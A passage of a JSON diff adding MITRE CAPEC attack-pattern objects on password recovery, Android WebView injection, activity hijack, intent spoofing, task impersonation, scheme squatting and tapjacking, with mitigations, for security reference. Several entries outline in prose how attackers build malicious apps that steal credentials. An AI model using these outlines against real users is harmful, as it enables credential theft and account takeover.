", + "x_capec_extended_description": "\n Most of them use only one security question. For instance, mother's maiden name tends to be a fairly popular one. Unfortunately in many cases this information is not very hard to find, especially if the attacker knows the legitimate user. These generic security questions are also re-used across many applications, thus making them even more insecure. An attacker could for instance overhear a coworker talking to a bank representative at the work place and supplying their mother's maiden name for verification purposes. An attacker can then try to log in into one of the victim's accounts, click on \"forgot password\" and there is a good chance that the security question there will be to provide mother's maiden name. A weak password recovery scheme totally undermines the effectiveness of a strong password scheme.\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The system allows users to recover their passwords and gain access back into the system.", + "Password recovery mechanism has been designed or implemented insecurely.", + "Password recovery mechanism relies only on something the user knows and not something the user has.", + "No third party intervention is required to use the password recovery mechanism." + ], + "x_capec_resources_required": [ + "For a brute force attack one would need a machine with sufficient CPU, RAM and HD." + ], + "x_capec_skills_required": { + "Low": "Brute force attack", + "Medium": "Social engineering and more sophisticated technical attacks." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Use multiple security questions (e.g. have three and make the user answer two of them correctly). Let the user select their own security questions or provide them with choices of questions that are not generic.", + "id": "course-of-action--5aefd1ed-4d4b-46a4-9523-4a9b10f1c157", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-50-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--6da8ba67-d140-4a4f-9f59-04f18c0652dd", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--5aefd1ed-4d4b-46a4-9523-4a9b10f1c157", + "target_ref": "attack-pattern--addd93c9-9278-4185-b402-e505d632c815", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "E-mail the temporary password to the registered e-mail address of the user rather than letting the user reset the password online.", + "id": "course-of-action--faa418c0-4283-4c6d-b462-3c7751003bae", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-50-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--aa9f80ff-b2df-47d3-9f28-3979f0827e13", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--faa418c0-4283-4c6d-b462-3c7751003bae", + "target_ref": "attack-pattern--addd93c9-9278-4185-b402-e505d632c815", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure that your password recovery functionality is not vulnerable to an injection style attack.", + "id": "course-of-action--17e33f25-5647-4186-9496-39840fbc7a3c", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-50-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--347ed834-4679-4e4c-9b81-cde8d3103190", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--17e33f25-5647-4186-9496-39840fbc7a3c", + "target_ref": "attack-pattern--addd93c9-9278-4185-b402-e505d632c815", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary, through a previously installed malicious application, injects code into the context of a web page displayed by a WebView component. Through the injected code, an adversary is able to manipulate the DOM tree and cookies of the page, expose sensitive information, and can launch attacks against the web application from within the web page.", + "external_references": [ + { + "external_id": "CAPEC-500", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/500.html" + }, + { + "external_id": "CWE-749", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/749.html" + }, + { + "external_id": "CWE-940", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/940.html" + }, + { + "description": "Tongbo Luo, Hao Hao, Wenliang Du, Yifei Wang, Heng Yin, Attacks on WebView in the Android System, 2011, Annual Computer Security Applications Conference (ACSAC)", + "external_id": "REF-430", + "source_name": "reference_from_CAPEC", + "url": "http://www.cis.syr.edu/~wedu/Research/paper/webview_acsac2011.pdf" + } + ], + "id": "attack-pattern--3a089725-f495-452a-a40b-980898ec308c", + "modified": "2023-01-24T00:00:00.000Z", + "name": "WebView Injection", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--5a33bee7-5ec9-4e75-9bf6-99fdaca8699c" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Determine target web application: An adversary first needs to determine what web application they wish to target.

    2. Techniques
    Target web applications that require users to enter sensitive information.
    Target web applications that an adversary wishes to operate on behalf of a logged in user.

Experiment

  1. Create malicious application: An adversary creates an application, often mobile, that incorporates a WebView component to display the targeted web application. This malicious application needs to downloaded by a user, so adversaries will make this application useful in some way.

    2. Techniques
    Create a 3rd party application that adds useful functionality to the targeted web application. Victims will download the application as a means of using the targeted web application.
    Create a fun game that at some point directs a user to the targeted web application. For example, prompt the user to buy in game currency by directing them to PayPal.

  2. Get the victim to download and run the application: An adversary needs to get the victim to willingly download and run the application.

    3. Techniques
    Pay for App Store advertisements
    Promote the application on social media, either through accounts made by the adversary or by paying for other accounts to advertise.

Exploit

  1. Inject malicious code: Once the victim runs the malicious application and views the targeted web page in the WebView component, the malicious application will inject malicious JavaScript code into the web application. This is done by using WebView's loadURL() API, which can inject arbitrary JavaScript code into pages loaded by the WebView component with the same privileges. This is often done by adding a script tag to the document body with a src destination to a remote location that serves malicious JavaScript code.

    2. Techniques
    Execute operations on the targeted web page on behalf of an authenticated user.
    Steal cookie information from the victim.
    Add in extra fields to the DOM in an attempt to get a user to divulge sensitive information.
", + "x_capec_prerequisites": [ + "An adversary must be able install a purpose built malicious application onto the device and convince the user to execute it. The malicious application is designed to target a specific web application and is used to load the target web pages via the WebView component. For example, an adversary may develop an application that interacts with Facebook via WebView and adds a new feature that a user desires. The user would install this 3rd party app instead of the Facebook app." + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "The only known mitigation to this type of attack is to keep the malicious application off the system. There is nothing that can be done to the target application to protect itself from a malicious application that has been installed and executed.", + "id": "course-of-action--3bed61fa-d7ce-4833-8489-af735deb4503", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-500-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--cd4750af-dabe-4e24-954b-34c20912113b", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--3bed61fa-d7ce-4833-8489-af735deb4503", + "target_ref": "attack-pattern--3a089725-f495-452a-a40b-980898ec308c", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary intercepts an implicit intent sent to launch a Android-based trusted activity and instead launches a counterfeit activity in its place. The malicious activity is then used to mimic the trusted activity's user interface and prompt the target to enter sensitive data as if they were interacting with the trusted activity.", + "external_references": [ + { + "external_id": "CAPEC-501", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/501.html" + }, + { + "external_id": "CWE-923", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/923.html" + }, + { + "description": "Erika Chin, Adrienne Porter Felt, Kate Greenwood, David Wagner, Analyzing Inter-Application Communication in Android, 2011, International Conference on Mobile Systems, Applications, and Services (MobiSys)", + "external_id": "REF-427", + "source_name": "reference_from_CAPEC", + "url": "https://people.eecs.berkeley.edu/~daw/papers/intents-mobisys11.pdf" + } + ], + "id": "attack-pattern--10ce28bf-9f93-4a45-a39e-6407141a34d4", + "modified": "2021-10-21T00:00:00.000Z", + "name": "Android Activity Hijack", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--48f21dcd-2490-49c6-9690-1cb586b201f4", + "attack-pattern--fc3a9a6f-66c9-4363-8ebd-9bd18725fff8" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data" + ] + }, + "x_capec_domains": [ + "Software", + "Software" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Find an android application that uses implicit intents: Since this attack only works on android applications that use implicit intents, rather than explicit intents, an adversary must first identify an app that uses implicit intents to launch an Android-based trusted activity, and what that activity is.

Experiment

  1. Create a malicious app: The adversary must create a malicious android app meant to intercept implicit intents to launch an Adroid-based trusted activity. This malicious app will mimic the trusted activiy's user interface to get the user to enter sensitive data.

    2. Techniques
    Specify the type of intent wished to be intercepted in the malicious app's manifest file using an intent filter

  2. Get user to download malicious app: The adversary must get a user using the targeted app to download the malicious app by any means necessary

Exploit

  1. Gather sensitive data through malicious app: Once the target application sends an implicit intent to launch a trusted activity, the malicious app will be launched instead that looks identical to the interface of that activity. When the user enters sensitive information it will be captured by the malicious app.

    2. Techniques
    Gather login information from a user using a malicious app
", + "x_capec_prerequisites": [ + "The adversary must have previously installed the malicious application onto the Android device that will run in place of the trusted activity." + ], + "x_capec_resources_required": [ + "Malware capable of acting on the adversary's objectives." + ], + "x_capec_skills_required": { + "High": "The adversary must typically overcome network and host defenses in order to place malware on the system." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "To mitigate this type of an attack, explicit intents should be used whenever sensitive data is being sent. An 'explicit intent' is delivered to a specific application as declared within the intent, whereas an 'implicit intent' is directed to an application as defined by the Android operating system. If an implicit intent must be used, then it should be assumed that the intent will be received by an unknown application and any response should be treated accordingly (i.e., with appropriate security controls).", + "id": "course-of-action--516fa894-49a7-4f72-93e4-a3f020c282a0", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-501-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--f8813501-20bf-40e5-8b15-3723c43763f4", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--516fa894-49a7-4f72-93e4-a3f020c282a0", + "target_ref": "attack-pattern--10ce28bf-9f93-4a45-a39e-6407141a34d4", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Never use implicit intents for inter-application communication.", + "id": "course-of-action--38f1729a-f19a-4847-86b0-d6fbb1ef4247", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-501-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--aa086131-b814-4144-b0d9-847410959588", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--38f1729a-f19a-4847-86b0-d6fbb1ef4247", + "target_ref": "attack-pattern--10ce28bf-9f93-4a45-a39e-6407141a34d4", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary, through a previously installed malicious application, issues an intent directed toward a specific trusted application's component in an attempt to achieve a variety of different objectives including modification of data, information disclosure, and data injection. Components that have been unintentionally exported and made public are subject to this type of an attack. If the component trusts the intent's action without verififcation, then the target application performs the functionality at the adversary's request, helping the adversary achieve the desired negative technical impact.", + "external_references": [ + { + "external_id": "CAPEC-502", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/502.html" + }, + { + "external_id": "CWE-284", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/284.html" + }, + { + "description": "Erika Chin, Adrienne Porter Felt, Kate Greenwood, David Wagner, Analyzing Inter-Application Communication in Android, 2011, International Conference on Mobile Systems, Applications, and Services (MobiSys)", + "external_id": "REF-427", + "source_name": "reference_from_CAPEC", + "url": "https://people.eecs.berkeley.edu/~daw/papers/intents-mobisys11.pdf" + } + ], + "id": "attack-pattern--b2e8de4b-6757-4e7e-9c5c-210c44100577", + "modified": "2021-06-24T00:00:00.000Z", + "name": "Intent Spoof", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--bd4f8f46-1bc7-40a9-b15a-e36b7671cf5b" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_prerequisites": [ + "An adversary must be able install a purpose built malicious application onto the Android device and convince the user to execute it. The malicious application will be used to issue spoofed intents." + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "To limit one's exposure to this type of attack, developers should avoid exporting components unless the component is specifically designed to handle requests from untrusted applications. Developers should be aware that declaring an intent filter will automatically export the component, exposing it to public access. Critical, state-changing actions should not be placed in exported components. If a single component handles both inter- and intra-application requests, the developer should consider dividing that component into separate components. If a component must be exported (e.g., to receive system broadcasts), then the component should dynamically check the caller's identity prior to performing any operations. Requiring Signature or SignatureOrSystem permissions is an effective way of limiting a component's exposure to a set of trusted applications. Finally, the return values of exported components can also leak private data, so developers should check the caller's identity prior to returning sensitive values.", + "id": "course-of-action--ba152037-676b-4900-8500-9e40f8772742", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-502-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--65d8ac0a-e778-439d-a210-5233c586c56e", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--ba152037-676b-4900-8500-9e40f8772742", + "target_ref": "attack-pattern--b2e8de4b-6757-4e7e-9c5c-210c44100577", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary, through a malicious web page, accesses application specific functionality by leveraging interfaces registered through WebView's addJavascriptInterface API. Once an interface is registered to WebView through addJavascriptInterface, it becomes global and all pages loaded in the WebView can call this interface.", + "external_references": [ + { + "external_id": "CAPEC-503", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/503.html" + }, + { + "external_id": "CWE-284", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/284.html" + }, + { + "description": "Tongbo Luo, Hao Hao, Wenliang Du, Yifei Wang, Heng Yin, Attacks on WebView in the Android System, 2011, Annual Computer Security Applications Conference (ACSAC)", + "external_id": "REF-430", + "source_name": "reference_from_CAPEC", + "url": "http://www.cis.syr.edu/~wedu/Research/paper/webview_acsac2011.pdf" + } + ], + "id": "attack-pattern--c195a0a3-62fc-4def-9702-8938440cc9a7", + "modified": "2020-07-30T00:00:00.000Z", + "name": "WebView Exposure", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--fd669b7d-0e79-473c-9808-a860dfb0c871" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_prerequisites": [ + "This type of an attack requires the adversary to convince the user to load the malicious web page inside the target application. Once loaded, the malicious web page will have the same permissions as the target application and will have access to all registered interfaces. Both the permission and the interface must be in place for the functionality to be exposed." + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "To mitigate this type of an attack, an application should limit permissions to only those required and should verify the origin of all web content it loads.", + "id": "course-of-action--89e7a7c9-d6c4-4353-adad-ee91dd8fb811", + "modified": "2020-07-30T00:00:00.000Z", + "name": "coa-503-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--1ba307f2-f881-482f-aff4-e2af10977631", + "modified": "2020-07-30T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--89e7a7c9-d6c4-4353-adad-ee91dd8fb811", + "target_ref": "attack-pattern--c195a0a3-62fc-4def-9702-8938440cc9a7", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary, through a previously installed malicious application, impersonates an expected or routine task in an attempt to steal sensitive information or leverage a user's privileges.", + "external_references": [ + { + "external_id": "CAPEC-504", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/504.html" + }, + { + "external_id": "CWE-1021", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1021.html" + }, + { + "description": "Masquerading: Masquerade Task or Service", + "external_id": "T1036.004", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1036/004" + }, + { + "description": "Adrienne Porter Felt, David Wagner, Phishing on Mobile Devices, 2011, University of California, Berkeley", + "external_id": "REF-434", + "source_name": "reference_from_CAPEC", + "url": "https://people.eecs.berkeley.edu/~daw/papers/mobphish-w2sp11.pdf" + } + ], + "id": "attack-pattern--1995c522-a25d-46e4-b024-65172771a692", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Task Impersonation", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--fc3a9a6f-66c9-4363-8ebd-9bd18725fff8" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authentication": [ + "Gain Privileges" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "An adversary monitors the system task list for Microsoft Outlook in an attempt to determine when the application may prompt the user to enter their credentials to view encrypted email. Once the task is executed, the adversary impersonates the credential prompt to obtain the user's Microsoft Outlook encryption credentials. These credentials can then be leveraged by the adversary to read a user's encrypted email.", + "An adversary prompts a user to authorize an elevation of privileges, implying that a background task needs additional permissions to execute. The user accepts the privilege elevation, allowing the adversary to execute additional malware or tasks with the user's privileges." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Determine suitable tasks to exploit: Determine what tasks exist on the target system that may result in a user providing sensitive information.

    2. Techniques
    Determine what tasks prompt a user for their credentials.
    Determine what tasks may prompt a user to authorize a process to execute with elevated privileges.

Exploit

  1. Impersonate Task: Impersonate a legitimate task, either expected or unexpected, in an attempt to gain user credentials or to ride the user's privileges.

    2. Techniques
    Prompt a user for their credentials, while making the user believe the credential request is legitimate.
    Prompt a user to authorize a task to run with elevated privileges, while making the user believe the request is legitimate.
", + "x_capec_extended_description": "\n When impersonating an expected task, the adversary monitors the task list maintained by the operating system and waits for a specific legitimate task to become active. Once the task is detected, the malicious application launches a new task in the foreground that mimics the user interface of the legitimate task. At this point, the user thinks that they are interacting with the legitimate task that they started, but instead they are interacting with the malicious application. Once the adversary's goal is reached, the malicious application can exit, leaving the original trusted application visible and the appearance that nothing out of the ordinary has occurred.\n A second approach entails the adversary impersonating an unexpected task, but one that may often be spawned by legitimate background processes. For example, an adversary may randomly impersonate a system credential prompt, implying that a background process requires authentication for some purpose. The user, believing they are interacting with a legitimate task, enters their credentials or authorizes the use of their stored credentials, which the adversary then leverages for nefarious purposes. This type of attack is most often used to obtain sensitive information (e.g., credentials) from the user, but may also be used to ride the user's privileges.\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_parent_of_refs": [ + "attack-pattern--f7a0e7bd-d24a-4390-b365-9e71f22e4e06" + ], + "x_capec_prerequisites": [ + "The adversary must already have access to the target system via some means.", + "A legitimate task must exist that an adversary can impersonate to glean credentials.", + "The user's privileges allow them to execute certain tasks with elevated privileges." + ], + "x_capec_resources_required": [ + "Malware or some other means to initially comprise the target system.", + "Additional malware to impersonate a legitimate task." + ], + "x_capec_skills_required": { + "Low": "Once an adversary has gained access to the target system, impersonating a task is trivial." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "The only known mitigation to this attack is to avoid installing the malicious application on the device. However, to impersonate a running task the malicious application does need the GET_TASKS permission to be able to query the task list, and being suspicious of applications with that permission can help.", + "id": "course-of-action--c40d7d86-ab26-4e1a-9b9b-e3496f0f36fc", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-504-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--3528ad55-1737-4d7b-b627-6716bbe22c84", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--c40d7d86-ab26-4e1a-9b9b-e3496f0f36fc", + "target_ref": "attack-pattern--1995c522-a25d-46e4-b024-65172771a692", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary, through a previously installed malicious application, registers for a URL scheme intended for a target application that has not been installed. Thereafter, messages intended for the target application are handled by the malicious application. Upon receiving a message, the malicious application displays a screen that mimics the target application, thereby convincing the user to enter sensitive information. This type of attack is most often used to obtain sensitive information (e.g., credentials) from the user as they think that they are interacting with the intended target application.", + "external_references": [ + { + "external_id": "CAPEC-505", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/505.html" + }, + { + "description": "Adrienne Porter Felt, David Wagner, Phishing on Mobile Devices, 2011, University of California, Berkeley", + "external_id": "REF-434", + "source_name": "reference_from_CAPEC", + "url": "https://people.eecs.berkeley.edu/~daw/papers/mobphish-w2sp11.pdf" + } + ], + "id": "attack-pattern--ef205569-ee34-491a-b773-5c023e2c1680", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Scheme Squatting", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--e9d5d2e4-588f-43c1-bc98-73417abbb727" + ], + "x_capec_domains": [ + "Social Engineering" + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "The only known mitigation to this attack is to avoid installing the malicious application on the device. Applications usually have to declare the schemes they wish to register, so detecting this during a review is feasible.", + "id": "course-of-action--f74b7999-9f3c-4cda-82d5-a40b0620f072", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-505-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--39c2732f-5fa7-44ba-9dab-86cc03c05888", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f74b7999-9f3c-4cda-82d5-a40b0620f072", + "target_ref": "attack-pattern--ef205569-ee34-491a-b773-5c023e2c1680", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary, through a previously installed malicious application, displays an interface that misleads the user and convinces them to tap on an attacker desired location on the screen. This is often accomplished by overlaying one screen on top of another while giving the appearance of a single interface. There are two main techniques used to accomplish this. The first is to leverage transparent properties that allow taps on the screen to pass through the visible application to an application running in the background. The second is to strategically place a small object (e.g., a button or text field) on top of the visible screen and make it appear to be a part of the underlying application. In both cases, the user is convinced to tap on the screen but does not realize the application that they are interacting with.", + "external_references": [ + { + "external_id": "CAPEC-506", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/506.html" + }, + { + "external_id": "CWE-1021", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1021.html" + }, + { + "description": "Marcus Niemietz, Jorg Schwenk, UI Redressing Attacks on Android Devices, 2012, Horst Gortz Institute for IT-Security", + "external_id": "REF-436", + "source_name": "reference_from_CAPEC", + "url": "https://media.blackhat.com/ad-12/Niemietz/bh-ad-12-androidmarcus_niemietz-WP.pdf" + }, + { + "description": "David Richardson, Look-10-007 - Tapjacking, 2010, Lookout Mobile Security", + "external_id": "REF-437", + "source_name": "reference_from_CAPEC", + "url": "https://blog.lookout.com/look-10-007-tapjacking/" + } + ], + "id": "attack-pattern--79309efd-dd13-41d2-81c6-ec382bced2b4", + "modified": "2020-07-30T00:00:00.000Z", + "name": "Tapjacking", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--fc3a9a6f-66c9-4363-8ebd-9bd18725fff8" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "This pattern of attack requires the ability to execute a malicious application on the user's device. This malicious application is used to present the interface to the user and make the attack possible." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary gains physical access to a system or device through theft of the item. Possession of a system or device enables a number of unique attacks to be executed and often provides the adversary with an extended timeframe for which to perform an attack. Most protections put in place to secure sensitive information can be defeated when an adversary has physical access and enough time.", + "external_references": [ + { + "external_id": "CAPEC-507", + "source_name": "capec", + "url": 